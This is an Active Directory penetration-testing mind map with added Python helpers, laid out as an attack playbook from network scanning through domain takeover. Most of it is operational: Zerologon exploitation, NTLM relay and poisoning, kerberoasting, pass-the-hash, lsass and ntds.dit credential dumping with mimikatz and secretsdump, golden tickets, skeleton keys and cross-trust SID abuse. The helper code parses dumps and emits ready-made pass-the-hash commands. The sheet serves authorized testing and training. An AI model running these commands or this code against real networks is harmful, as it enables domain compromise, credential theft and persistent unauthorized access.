Pentesting_Active_directory (XMind mind map)

  1. Scan Network

    1. cme smb <ip_range> # enumerate smb hosts
    2. nmap -sn <ip_range> # ping sweep (-sP is the old spelling of -sn; it takes no -p)
    3. nmap -Pn -sV --top-ports 50 --open <ip> # quick scan
    4. nmap -Pn --script smb-vuln* -p139,445 <ip> # search smb vuln
    5. nmap -Pn -sC -sV <ip> # classic scan
    6. nmap -Pn -sC -sV -p- <ip> # full scan
    7. nmap -sU -sC -sV <ip> # udp scan
    8. find vulnerable host
  2. find AD IP

    1. nmcli dev show eth0 # show domain name & dns
    2. nslookup -type=SRV _ldap._tcp.dc._msdcs.<domain> # lists the domain controllers
  3. zone transfer

    1. dig axfr <domain_name> @<name_server>
  4. List guest access on smb share

    1. enum4linux -a -u "" -p "" <dc-ip> && enum4linux -a -u "guest" -p "" <dc-ip>
    2. smbmap -u "" -p "" -P 445 -H <dc-ip> && smbmap -u "guest" -p "" -P 445 -H <dc-ip>
    3. smbclient -U '%' -L //<dc-ip> && smbclient -U 'guest%' -L //<dc-ip>
    4. cme smb <ip> -u '' -p '' # enumerate null session
    5. cme smb <ip> -u 'a' -p '' # enumerate anonymous access
  5. Enumerate ldap

    1. nmap -n -sV --script "ldap* and not brute" -p 389 <dc-ip>
    2. ldapsearch -x -h <ip> -s base # anonymous bind, reads the rootDSE (naming contexts, DC name); recent OpenLDAP clients want -H ldap://<ip> instead of -h
    3. user found
  6. Find user list

    1. enum4linux -U <dc-ip> | grep 'user:'
    2. crackmapexec smb <ip> -u <user> -p '<password>' --users
    3. OSINT – enumerate username on internet

      1. nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='<domain>',userdb=<users_list_file>" <ip> # validates the candidate names against the KDC, no lockout
    4. user found
  7. relay/poisoning

    1. find smb not signed

      1. nmap -Pn -sS -T4 --open --script smb-security-mode -p445 <ip_range>
      2. use exploit/windows/smb/smb_relay
      3. cme smb <ip_range> --gen-relay-list relay.txt
      4. unsigned SMB
    2. PetitPotam.py -d <domain> <listener_ip> <target_ip>
    3. responder -I eth0 # -I is the interface, -i would be an IP
    4. mitm6 -d <domain>
    5. user & hash found
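Building the relay target list by hand from the nmap output above, as an added example that is not part of the mind map (the sample scan output is constructed, the hosts are made up). The point it makes: nmap reports three states, and only "required" blocks relaying; "supported" (signing on but not enforced) is still a valid target, which is why a filter on the word "disabled" alone misses hosts.

```python
import re

# Constructed sample of `nmap -Pn -p445 --script smb-security-mode` normal output
# for three hosts (not a real scan). Only the fields the parser needs are kept.
SAMPLE_NMAP_OUTPUT = """\
Nmap scan report for 10.10.10.5
445/tcp open  microsoft-ds
Host script results:
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)

Nmap scan report for dc01.htb.local (10.10.10.10)
445/tcp open  microsoft-ds
Host script results:
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required

Nmap scan report for 10.10.10.20
445/tcp open  microsoft-ds
Host script results:
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: supported
"""

# "Nmap scan report for 1.2.3.4" or "Nmap scan report for name (1.2.3.4)"
HOST_RE = re.compile(r"^Nmap scan report for (?:\S+ \()?(\d{1,3}(?:\.\d{1,3}){3})\)?")
# "|_  message_signing: disabled (dangerous, but default)" / "supported" / "required"
SIGNING_RE = re.compile(r"^\|_?\s+message_signing:\s*(\w+)")


def signing_status(nmap_output):
    """Map each scanned IP to its SMB signing mode: 'disabled', 'supported' or 'required'."""
    status = {}
    host = None
    for line in nmap_output.splitlines():
        m = HOST_RE.match(line)
        if m:
            host = m.group(1)
            continue
        m = SIGNING_RE.match(line)
        if m and host:
            status[host] = m.group(1)
    return status


def relay_targets(nmap_output):
    """Hosts that accept an unsigned SMB session. 'supported' means signing is
    enabled but not enforced, which still allows relay; only 'required' blocks it.
    Domain controllers require signing by default, so relay to their LDAP instead."""
    return [h for h, s in signing_status(nmap_output).items() if s != "required"]


def relay_list_file(nmap_output):
    """Content for a targets file usable with `ntlmrelayx.py -tf targets.txt`."""
    return "\n".join(relay_targets(nmap_output)) + "\n"


if __name__ == "__main__":
    print(relay_list_file(SAMPLE_NMAP_OUTPUT), end="")
```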
  8. zerologon

    1. python3 cve-2020-1472-exploit.py <MACHINE_BIOS_NAME> <ip> # sets the DC machine account password to empty; restore it right after (step below) or replication and the DC break
       secretsdump.py '<DOMAIN>/<MACHINE_BIOS_NAME>$'@<IP> -no-pass -just-dc-user "Administrator"
       secretsdump.py -hashes :<HASH_admin> <DOMAIN>/Administrator@<IP> # the machine account's plain_password_hex in this dump is the value to restore

      1. python3 restorepassword.py -target-ip <IP> <DOMAIN>/<MACHINE_BIOS_NAME>@<MACHINE_BIOS_NAME> -hexpass <HEXPASS>
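Why the exploit above succeeds after a few hundred tries, as an added example (not the exploit script's code). Netlogon computes the client credential with AES-CFB8 using an all-zero IV; with a zero plaintext the whole 8-byte output is zero whenever the first byte of E_k(0) is zero, which happens for about 1 key in 256, and the attacker simply retries with a zero challenge until the server's fresh session key is one of those. The code models that with a stand-in keyed function instead of AES and a simplified session-key derivation, both hypothetical and marked as such; CFB8 only ever uses the forward direction of the block cipher, so the argument is the same for real AES.

```python
import hashlib

BLOCK = 16                  # AES block size: CFB8 keeps a 16-byte shift register
ZERO_IV = bytes(BLOCK)      # the IV Netlogon uses (the bug)
ZERO_CHALLENGE = bytes(8)   # the all-zero ClientChallenge / ClientCredential the exploit sends


def toy_block_cipher(key: bytes, block: bytes) -> bytes:
    """Stand-in for AES-128 encryption of one block (hypothetical, NOT AES).
    Any keyed 16-byte-in / 16-byte-out function exhibits the same zero-IV weakness."""
    return hashlib.sha256(key + block).digest()[:BLOCK]


def cfb8_encrypt(key: bytes, iv: bytes, plaintext: bytes, block=toy_block_cipher) -> bytes:
    """CFB8 as used by ComputeNetlogonCredential: encrypt the shift register, XOR its
    first byte into the next plaintext byte, shift the ciphertext byte into the register."""
    register = bytearray(iv)
    out = bytearray()
    for p in plaintext:
        keystream_byte = block(key, bytes(register))[0]
        c = p ^ keystream_byte
        out.append(c)
        register = register[1:] + bytes([c])
    return bytes(out)


def credential_is_all_zero(session_key: bytes) -> bool:
    """Does a zero ClientChallenge produce a zero ClientCredential under this key?"""
    return cfb8_encrypt(session_key, ZERO_IV, ZERO_CHALLENGE) == ZERO_CHALLENGE


def first_keystream_byte_is_zero(session_key: bytes) -> bool:
    """The condition above reduces to this: with IV = 0 and ciphertext bytes of 0,
    the register never changes, so every keystream byte is E_k(0)[0]."""
    return toy_block_cipher(session_key, ZERO_IV)[0] == 0


def count_vulnerable_keys(n_keys: int) -> int:
    """How many of the first n_keys sequential keys give a zero credential (expect ~n/256)."""
    return sum(credential_is_all_zero(i.to_bytes(BLOCK, "big")) for i in range(n_keys))


def derive_session_key(machine_secret: bytes, server_challenge: bytes) -> bytes:
    """Hypothetical stand-in for the Netlogon session-key derivation. The real one
    (MS-NRPC 3.1.4.3.1) mixes the machine secret with both challenges; what matters
    here is that every new ServerChallenge yields a fresh, unpredictable key."""
    return hashlib.sha256(machine_secret + server_challenge).digest()[:BLOCK]


def simulate_zerologon(machine_secret: bytes, max_attempts: int = 20000):
    """The exploit loop: start a new handshake (fresh server challenge, hence fresh
    session key), send ClientChallenge = 0 and ClientCredential = 0, and win when
    the server's own computation is also 0. Returns the winning attempt number, or None."""
    for attempt in range(1, max_attempts + 1):
        server_challenge = attempt.to_bytes(8, "big")  # modelled deterministically
        key = derive_session_key(machine_secret, server_challenge)
        if credential_is_all_zero(key):
            return attempt
    return None


if __name__ == "__main__":
    print("vulnerable keys in 65536:", count_vulnerable_keys(65536), "(expected ~256)")
    print("attempts needed:", simulate_zerologon(b"constructed-machine-secret"))
```

A DC patched for CVE-2020-1472 rejects a zero ClientCredential in the authenticate step and also refuses the unencrypted (unsigned) RPC flags the exploit relies on, so a single failed zero-challenge attempt is not a reliable patch check; the `cve-2020-1472-exploit.py` checker makes the full 2000-attempt run for that reason.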
  9. mayfly (@M4yFly)
  10. Got one account on the domain

    1. Get all users

      1. GetADUsers.py -all -dc-ip <dc_ip> <domain>/<username>
    2. enumerate SMB share

      1. cme smb <ip> -u <user> -p <password> –shares
    3. bloodhound

      1. bloodhound-python -d <domain> -u <user> -p <password> -gc <dc> -c all
    4. powerview / pywerview
    5. kerberoasting

      1. Get hash

        1. GetUserSPNs.py -request -dc-ip <dc_ip> <domain>/<user>:<password>
        2. Rubeus kerberoast
        3. hash found
      2. Get kerberoastable users

        1. Get-DomainUser -SPN -Properties SamAccountName, ServicePrincipalName
        2. MATCH (u:User {hasspn:true}) RETURN u
        3. MATCH (u:User {hasspn:true}), (c:Computer), p=shortestPath((u)-[*1..]->(c)) RETURN p
    6. MS14-068

      1. FindSMB2UPTime.py <ip>

        1. rpcclient $> lookupnames <name>
          wmic useraccount get name,sid
          auxiliary/admin/kerberos/ms14_068_kerberos_checksum
        2. goldenPac.py -dc-ip <dc_ip> <domain>/<user>:'<password>'@<target>

          1. kerberos::ptc “<ticket>”
    7. dnscmd.exe /config /serverlevelplugindll \\<path_to_dll> # needs a DnsAdmins member; UNC path the DC can read; the DLL is loaded when the DNS service restarts

      1. sc \\DNSServer stop dns
         sc \\DNSServer start dns
    8. PrintNightmare

      1. CVE-2021-1675.py <domain>/<user>:<password>@<target> '\\<smb_server_ip>\<share>\inject.dll'
    9. enum dns

      1. dnstool.py -u '<domain>\<user>' -p '<password>' --record '*' --action query <dc_ip>
  11. Got valid username

    1. Password spray

      1. Get password policy

        1. crackmapexec smb <IP> -u 'user' -p 'password' --pass-pol
        2. enum4linux -u 'username' -p 'password' -P <IP>
      2. cme smb <dc-ip> -u user.txt -p password.txt --no-bruteforce # pairwise: line N of user.txt with line N of password.txt (e.g. user=password)
      3. cme smb <dc-ip> -u user.txt -p password.txt # every user against every password; stay under the lockout threshold per observation window
      4. credentials found
    2. ASREPRoast

      1. Get hash

        1. python GetNPUsers.py <domain>/ -usersfile <usernames.txt> -format hashcat -outputfile <hashes.domain.txt>
        2. Rubeus asreproast /format:hashcat
      2. Get ASREPRoastable users

        1. Get-DomainUser -PreauthNotRequired -Properties SamAccountName
        2. MATCH (u:User {dontreqpreauth:true}), (c:Computer), p=shortestPath((u)-[*1..]->(c)) RETURN p
      3. hash found
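The selection the PowerView and Cypher queries above perform, done over the raw attributes, as an added example serving both the kerberoasting and the ASREPRoast branches (not code from the mind map). The directory snapshot is constructed; the flag values are the documented userAccountControl and msDS-SupportedEncryptionTypes bits. It adds the filters a practitioner applies before requesting tickets: skip krbtgt, disabled and machine accounts, and note which SPN accounts are AES-only, since an RC4 (etype 23) ticket cracks far faster than an AES one.

```python
# userAccountControl bits (MS-SAMR / MS-ADTS)
ACCOUNTDISABLE = 0x0002
WORKSTATION_TRUST_ACCOUNT = 0x1000
SERVER_TRUST_ACCOUNT = 0x2000
DONT_REQ_PREAUTH = 0x400000
# msDS-SupportedEncryptionTypes bits
RC4_HMAC = 0x4
AES128_CTS_HMAC_SHA1_96 = 0x8
AES256_CTS_HMAC_SHA1_96 = 0x10

# Constructed snapshot of the attributes the queries read (not real LDAP output)
USERS = [
    {"sAMAccountName": "krbtgt", "userAccountControl": 0x202,
     "servicePrincipalName": ["kadmin/changepw"]},
    {"sAMAccountName": "svc_sql", "userAccountControl": 0x10200,
     "servicePrincipalName": ["MSSQLSvc/sql01.htb.local:1433"]},
    {"sAMAccountName": "svc_web", "userAccountControl": 0x200,
     "servicePrincipalName": ["HTTP/web01.htb.local"],
     "msDS-SupportedEncryptionTypes": AES128_CTS_HMAC_SHA1_96 | AES256_CTS_HMAC_SHA1_96},
    {"sAMAccountName": "svc_old", "userAccountControl": 0x202,
     "servicePrincipalName": ["HOST/old01.htb.local"]},
    {"sAMAccountName": "DC01$", "userAccountControl": 0x82000,
     "servicePrincipalName": ["ldap/dc01.htb.local"]},
    {"sAMAccountName": "jdoe", "userAccountControl": 0x400200},
    {"sAMAccountName": "tsmith", "userAccountControl": 0x400202},
    {"sAMAccountName": "asmith", "userAccountControl": 0x200},
]


def is_disabled(u):
    return bool(u["userAccountControl"] & ACCOUNTDISABLE)


def is_machine(u):
    return bool(u["userAccountControl"] & (WORKSTATION_TRUST_ACCOUNT | SERVER_TRUST_ACCOUNT))


def kerberoastable(users, include_machines=False):
    """Same selection as Get-DomainUser -SPN / MATCH (u:User {hasspn:true}), plus the
    filters applied before requesting TGS tickets: krbtgt and disabled accounts are
    useless, machine accounts carry 120-character random passwords.
    Returns (sAMAccountName, 'rc4' | 'aes-only')."""
    out = []
    for u in users:
        if not u.get("servicePrincipalName") or u["sAMAccountName"].lower() == "krbtgt":
            continue
        if is_disabled(u) or (is_machine(u) and not include_machines):
            continue
        etypes = u.get("msDS-SupportedEncryptionTypes", 0)
        # unset (0) means the DC default applies, which historically allows RC4;
        # an RC4 ticket cracks with hashcat -m 13100, AES-only needs 19600/19700
        rc4 = etypes == 0 or bool(etypes & RC4_HMAC)
        out.append((u["sAMAccountName"], "rc4" if rc4 else "aes-only"))
    return out


def asreproastable(users):
    """Same as Get-DomainUser -PreauthNotRequired / {dontreqpreauth:true}, minus disabled accounts."""
    return [u["sAMAccountName"] for u in users
            if u["userAccountControl"] & DONT_REQ_PREAUTH and not is_disabled(u)]


if __name__ == "__main__":
    print("kerberoast:", kerberoastable(USERS))
    print("asreproast:", asreproastable(USERS))
```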
  12. Lateral move

    1. pass the hash

      1. psexec.py -hashes ":<hash>" <user>@<ip>
      2. wmiexec.py -hashes ":<hash>" <user>@<ip>
      3. atexec.py -hashes ":<hash>" <user>@<ip> "command"
      4. evil-winrm -i <ip> -u <user> -H <hash>
      5. xfreerdp /u:<user> /d:<domain> /pth:<hash> /v:<ip> # only works if Restricted Admin mode is enabled on the target
    2. overpass the hash / pass the key (PTK)

      1. python getTGT.py <domain>/<user> -hashes :<nt_hash> # overpass the hash; -aesKey <aes_key> for pass the key

        1. export KRB5CCNAME=/root/impacket-examples/domain_ticket.ccache

          1. python psexec.py <domain>/<user>@<ip> -k -no-pass
      2. Rubeus asktgt /user:victim /rc4:<rc4value>

        1. Rubeus ptt /ticket:<ticket>
        2. Rubeus createnetonly /program:C:\Windows\System32\cmd.exe # or upnpcont.exe; note the LUID of the new logon session

          1. Rubeus ptt /luid:0xdeadbeef /ticket:<ticket>
    3. Unconstrained delegation

      1. Get tickets

        1. mimikatz "privilege::debug" "sekurlsa::tickets /export"
        2. Rubeus dump /service:krbtgt /nowrap
        3. Rubeus dump /luid:0xdeadbeef /nowrap
      2. Get unconstrained delegation machines

        1. Get-NetComputer -Unconstrained
        2. Get-DomainComputer -Unconstrained -Properties DnsHostName
        3. MATCH (c:Computer {unconstraineddelegation:true}) RETURN c
        4. MATCH (u:User {owned:true}), (c:Computer {unconstraineddelegation:true}), p=shortestPath((u)-[*1..]->(c)) RETURN p
    4. Constrained delegation

      1. Get tickets

        1. mimikatz "privilege::debug" "sekurlsa::tickets /export"
        2. Rubeus dump /service:krbtgt /nowrap
        3. Rubeus dump /luid:0xdeadbeef /nowrap
      2. Get constrained delegation machines

        1. Get-DomainComputer -TrustedToAuth -Properties DnsHostName, MSDS-AllowedToDelegateTo
        2. MATCH (c:Computer), (t:Computer), p=((c)-[:AllowedToDelegate]->(t)) RETURN p
        3. MATCH (u:User {owned:true}), (c:Computer {name: "<MYTARGET.FQDN>"}), p=shortestPath((u)-[*1..]->(c)) RETURN p
    5. Resource-Based Constrained Delegation
    6. dcsync

      1. lsadump::dcsync /domain:<domain> /user:krbtgt # needs the replication rights (DS-Replication-Get-Changes*): Administrators, Domain Admins, Enterprise Admins or Domain Controller computer accounts
    7. WSUSpect

      1. WSUSpendu.ps1 # need compromised WSUS server
    8. sccm

      1. CMPivot
    9. MSSQL Trusted Links

      1. use exploit/windows/mssql/mssql_linkcrawler
    10. Printers spooler service abuse

      1. rpcdump.py <domain>/<user>:<password>@<domain_server> | grep MS-RPRN

        1. printerbug.py '<domain>/<username>:<password>'@<printer_ip> <responder_ip>
    11. AD acl abuse

      1. aclpwn.py

        1. GenericAll on User
        2. GenericAll on Group
        3. GenericAll / GenericWrite / Write on Computer
        4. WriteProperty on Group
        5. Self (Self-Membership) on Group
        6. WriteProperty (Self-Membership)
        7. ForceChangePassword
        8. WriteOwner on Group
        9. GenericWrite on User
        10. WriteDACL + WriteOwner
    12. GPO Delegation
    13. get laps passwords

      1. Get-LAPSPasswords -DomainController <ip_dc> -Credential <domain>\<login> | Format-Table -AutoSize
      2. foreach ($objResult in $colResults) { $objComputer = $objResult.Properties; $objComputer.name | Where-Object { $_ -ne $env:COMPUTERNAME } | ForEach-Object { Get-AdmPwdPassword -ComputerName $_ } } # $colResults = DirectorySearcher results over computer objects; needs read access on ms-Mcs-AdmPwd
    14. privexchange

      1. python privexchange.py -ah <attacker_host_or_ip> <exchange_host> -u <user> -d <domain> -p <password>

        1. ntlmrelayx.py -t ldap://<dc_fqdn> --escalate-user <user>
    15. ADCS
  13. Kindly provided by Orange Cyberdefense 😉
    Some commands can break stuff, be sure you know what you are doing!
    Please find legend below.
  14. Bloodhound
  15. PowerView
  16. find hash

    1. crack hash

      1. LM

        1. john --format=lm hash.txt
        2. hashcat -m 3000 -a 3 hash.txt
      2. NTLM

        1. john --format=nt hash.txt
        2. hashcat -m 1000 -a 3 hash.txt
      3. NTLMv1

        1. john --format=netntlm hash.txt
        2. hashcat -m 5500 -a 3 hash.txt
      4. NTLMv2

        1. john --format=netntlmv2 hash.txt
        2. hashcat -m 5600 -a 0 hash.txt rockyou.txt
      5. Kerberos 5 TGS

        1. john spn.txt --format=krb5tgs --wordlist=rockyou.txt
        2. hashcat -m 13100 -a 0 spn.txt rockyou.txt
      6. Kerberos ASREP

        1. hashcat -m 18200 -a 0 AS-REP_roast-hashes rockyou.txt
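Sorting a mixed pile of captured and dumped lines into the right john format and hashcat mode, as an added example that is not part of the mind map. The sample lines are constructed (the two well-known hashes are those of "password" and of the empty password; the rest is filler hex). It encodes the checks worth automating: a pwdump line is two hashes (crack a real LM half first, it is cheap), the empty-LM marker `aad3b435...` and the empty-password NT hash `31d6cfe0...` are not worth a cracking run, and NetNTLMv1 vs v2 is told apart by field widths rather than by name. Modes for AES Kerberos tickets (19600/19700) are included; john formats for those are left unset.

```python
import re
from collections import defaultdict

HEX = "[0-9a-fA-F]"
PWDUMP_RE = re.compile(rf"^([^:\s]+):(\d+):({HEX}{{32}}):({HEX}{{32}}):::")
# user::domain:lmresp(48):ntresp(48):challenge(16)
NETNTLMV1_RE = re.compile(rf"^[^:]+::[^:]*:{HEX}{{48}}:{HEX}{{48}}:{HEX}{{16}}$")
# user::domain:challenge(16):NTProofStr(32):blob
NETNTLMV2_RE = re.compile(rf"^[^:]+::[^:]*:{HEX}{{16}}:{HEX}{{32}}:{HEX}+$")
KRB5TGS_RE = re.compile(r"^\$krb5tgs\$(\d+)\$")
KRB5ASREP_RE = re.compile(r"^\$krb5asrep\$(\d+)\$")

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM half when no LM hash is stored
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of the empty password

# etype -> (john --format, hashcat -m); None = not covered here
TGS_MODES = {"23": ("krb5tgs", 13100), "17": (None, 19600), "18": (None, 19700)}
ASREP_MODES = {"23": ("krb5asrep", 18200)}

# Constructed input lines (not a real capture)
SAMPLE_LINES = [
    "Administrator:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::",
    "guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::",
    "jdoe::HTB:1122334455667788:" + "a" * 32 + ":0101000000000000" + "b" * 40,
    "jdoe::HTB:" + "c" * 48 + ":" + "d" * 48 + ":1122334455667788",
    "$krb5tgs$23$*svc_sql$HTB.LOCAL$MSSQLSvc/sql01.htb.local:1433*$" + "e" * 32 + "$" + "f" * 64,
    "$krb5tgs$18$svc_web$HTB.LOCAL$*HTTP/web01.htb.local*$" + "a" * 24 + "$" + "b" * 64,
    "$krb5asrep$23$jdoe@HTB.LOCAL:" + "c" * 32 + "$" + "d" * 64,
    "htb.local\\svc_backup:aes256-cts-hmac-sha1-96:" + "e" * 64,   # Kerberos key, not crackable
]


def classify(line):
    """Identify one line. Returns a list of (label, john_format, hashcat_mode, hash);
    a pwdump line can yield an LM entry and an NT entry, an unknown line yields []."""
    line = line.strip()
    m = PWDUMP_RE.match(line)
    if m:
        user, _rid, lm, nt = m.groups()
        out = []
        if lm.lower() != EMPTY_LM:
            out.append(("LM", "lm", 3000, f"{user}:{lm}"))
        if nt.lower() == EMPTY_NT:
            out.append(("NTLM (empty password)", None, None, f"{user}:{nt}"))
        else:
            out.append(("NTLM", "nt", 1000, f"{user}:{nt}"))
        return out
    if NETNTLMV1_RE.match(line):
        return [("NetNTLMv1", "netntlm", 5500, line)]
    if NETNTLMV2_RE.match(line):
        return [("NetNTLMv2", "netntlmv2", 5600, line)]
    m = KRB5TGS_RE.match(line)
    if m:
        john, hc = TGS_MODES.get(m.group(1), (None, None))
        return [(f"Kerberos TGS-REP etype {m.group(1)}", john, hc, line)]
    m = KRB5ASREP_RE.match(line)
    if m:
        john, hc = ASREP_MODES.get(m.group(1), (None, None))
        return [(f"Kerberos AS-REP etype {m.group(1)}", john, hc, line)]
    return []


def hashcat_buckets(lines):
    """Group the crackable hashes by hashcat mode: one bucket per input file."""
    buckets = defaultdict(list)
    for line in lines:
        for _label, _john, mode, h in classify(line):
            if mode is not None:
                buckets[mode].append(h)
    return dict(buckets)


if __name__ == "__main__":
    for mode, hashes in sorted(hashcat_buckets(SAMPLE_LINES).items()):
        print(f"hashcat -m {mode}: {len(hashes)} hash(es)")
```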
  17. relay

    1. MS08-068

      1. use exploit/windows/smb/smb_relay # Windows 2000 up to Windows Server 2008 without the MS08-068 patch
    2. responder -I eth0 # set SMB = Off and HTTP = Off in Responder.conf so ntlmrelayx can bind 445/80

      1. ntlmrelayx.py -tf targets.txt
    3. mitm6 -i eth0 -d <domain>

      1. ntlmrelayx.py -6 -wh <attacker_ip> -l /tmp -socks -debug
      2. ntlmrelayx.py -6 -wh <attacker_ip> -t smb://<target> -l /tmp -socks -debug
      3. ntlmrelayx.py -t ldaps://<dc_ip> -wh <attacker_ip> --delegate-access # creates a machine account and sets RBCD on the relayed computer account

        1. getST.py -spn cifs/<target> '<domain>/<netbios_name>$' -impersonate <user>
    4. adcs

      1. ntlmrelayx.py -t http://<ca_host>/certsrv/certfnsh.asp -debug -smb2support --adcs --template DomainController # target is the web enrollment endpoint; the DomainController template applies when the coerced account is a DC (PetitPotam / printerbug)

        1. Rubeus.exe asktgt /user:<user> /certificate:<base64-certificate> /ptt
  18. Domain admin

    1. dump ntds.dit

      1. crackmapexec smb <dc_ip> -u <user> -p <password> -d <domain> --ntds
      2. secretsdump.py '<domain>/<user>:<pass>'@<dc_ip>
      3. ntdsutil "ac i ntds" "ifm" "create full c:\temp" q q # on the DC: consistent offline copy of ntds.dit plus the SYSTEM hive

        1. secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL -outputfile ntlm-extract
      4. windows/gather/credentials/domain_hashdump
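What to do with the dump before spraying hashes around, as an added example that is not part of the mind map and serves both this section and the pass-the-hash branch under "Lateral move": parse secretsdump-style lines, find accounts sharing an NT hash (password reuse, the quickest win for lateral movement), flag stored LM hashes and empty passwords, and emit the impacket invocations. The dump text is constructed (the repeated hash is that of "password"); the domain, RIDs and host are made up.

```python
import re
from collections import defaultdict

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"
# domain\user:rid:lmhash:nthash:::  (domain prefix is absent for local SAM dumps)
LINE_RE = re.compile(
    r"^(?:(?P<domain>[^\\:]+)\\)?(?P<user>[^:]+):(?P<rid>\d+):"
    r"(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::$", re.I)

# Constructed secretsdump-style output (not a real dump)
SAMPLE_DUMP = """\
[*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)
htb.local\\Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
htb.local\\Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\\krbtgt:502:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
htb.local\\svc_backup:1105:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
htb.local\\jdoe:1108:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
htb.local\\asmith:1109:aad3b435b51404eeaad3b435b51404ee:fedcba9876543210fedcba9876543210:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:abcdef0123456789abcdef0123456789:::
[*] Kerberos keys grabbed
htb.local\\Administrator:aes256-cts-hmac-sha1-96:0011223344556677889900112233445566778899001122334455667788990011
"""


def parse_dump(text):
    """Keep only the NTLM lines; Kerberos keys, cleartext and banners are skipped."""
    accounts = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            a = m.groupdict()
            a["lm"], a["nt"] = a["lm"].lower(), a["nt"].lower()
            accounts.append(a)
    return accounts


def shared_nt_hashes(accounts):
    """NT hash -> users sharing it: same password, so one crack or one PtH covers all."""
    groups = defaultdict(list)
    for a in accounts:
        groups[a["nt"]].append(a["user"])
    return {h: users for h, users in groups.items() if len(users) > 1}


def weak_accounts(accounts):
    """Findings worth reporting on their own: empty passwords and LM hashes still stored."""
    return {
        "empty_password": [a["user"] for a in accounts if a["nt"] == EMPTY_NT],
        "lm_hash_stored": [a["user"] for a in accounts if a["lm"] != EMPTY_LM],
    }


def pth_commands(accounts, host):
    """impacket pass-the-hash lines; skips machine accounts, krbtgt and empty passwords."""
    cmds = []
    for a in accounts:
        if a["user"].endswith("$") or a["rid"] == "502" or a["nt"] == EMPTY_NT:
            continue
        prefix = f'{a["domain"]}/' if a["domain"] else ""
        cmds.append(f'wmiexec.py -hashes :{a["nt"]} {prefix}{a["user"]}@{host}')
    return cmds


if __name__ == "__main__":
    accounts = parse_dump(SAMPLE_DUMP)
    print("reuse:", shared_nt_hashes(accounts))
    print("weak:", weak_accounts(accounts))
    print("\n".join(pth_commands(accounts, "10.10.10.10")))
```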
  19. Persistence

    1. net group "domain admins" myuser /add /domain
    2. Golden ticket

      1. ticketer.py -nthash <krbtgt_nthash> -domain-sid <domain_sid> -domain <domain> <user>
    3. Silver Ticket
    4. DSRM

      1. PowerShell New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa" -Name "DsrmAdminLogonBehavior" -Value 2 -PropertyType DWORD # lets the DSRM Administrator (hash from lsadump::sam on the DC) log on over the network
    5. Skeleton Key

      1. mimikatz "privilege::debug" "misc::skeleton" "exit"
    6. Custom SSP

      1. mimikatz "privilege::debug" "misc::memssp" "exit"

        1. C:\Windows\System32\kiwissp.log
  20. Administrator access

    1. get credentials

      1. procdump.exe -accepteula -ma lsass.exe lsass.dmp

        1. mimikatz "privilege::debug" "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords" "exit"
      2. mimikatz "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump::sam" "exit"
      3. post/windows/gather/smart_hashdump

        1. hashdump
      4. cme smb <ip_range> -u <user> -p <password> -M lsassy
      5. cme smb <ip_range> -u <user> -p '<password>' --sam / --lsa / --ntds
    2. LSA as a Protected Process

      1. PPLdump64.exe <lsass.exe|lsass_pid> lsass.dmp
      2. mimikatz "!+" "!processprotect /process:lsass.exe /remove" "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "!processprotect /process:lsass.exe" "!-" # with mimidriver.sys
    3. search password files

      1. findstr /si password *.txt *.xml *.docx
    4. search stored password

      1. lazagne.exe all
    5. shadow copies

      1. diskshadow list shadows all

        1. mklink /d c:\shadowcopy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
    6. token manipulation

      1. .\incognito.exe list_tokens -u

        1. .\incognito.exe execute -c "<domain>\<user>" powershell.exe
      2. use incognito

        1. impersonate_token <domain>\\<user> # double backslash inside meterpreter
    7. dpapi extract
  21. Low hanging fruit

    1. java rmi

      1. exploit/multi/misc/java_rmi_server
    2. ms17-010

      1. exploit/windows/smb/ms17_010_eternalblue
    3. tomcat/jboss manager

      1. auxiliary/scanner/http/tomcat_enum
        exploit/multi/http/tomcat_mgr_deploy
    4. java serialized port

      1. ysoserial
    5. vulnerable product with cve

      1. searchsploit
    6. MS14-025

      1. use scanner/smb/smb_enum_gpp
      2. findstr /S /I cpassword \\<FQDN>\sysvol\<FQDN>\policies\*.xml
    7. database credentials

      1. use admin/mssql/mssql_enum_sql_logins
    8. proxylogon
    9. proxyshell
  22. Low access

    1. winpeas.exe
    2. search password files

      1. findstr /si password *.txt *.xml *.docx
    3. Juicy Potato / Lovely Potato
    4. PrintSpoofer
    5. RoguePotato
    6. SMBGhost CVE-2020-0796
    7. CVE-2021-36934 (HiveNightmare/SeriousSAM)
  23. Trust relationship

    1. Child Domain to Forest Compromise – SID Hijacking

      1. Get-NetGroup -Domain <root_domain> -GroupName "Enterprise Admins" -FullData | select objectsid # the root domain SID is this value without its trailing -519

        1. mimikatz lsadump::trust

          1. kerberos::golden /user:Administrator /krbtgt:<child_krbtgt_hash> /domain:<child_domain> /sid:<child_domain_sid> /sids:<root_domain_sid>-519 /ptt # Enterprise Admins via SID history; works inside a forest because SID filtering is not applied on parent/child trusts
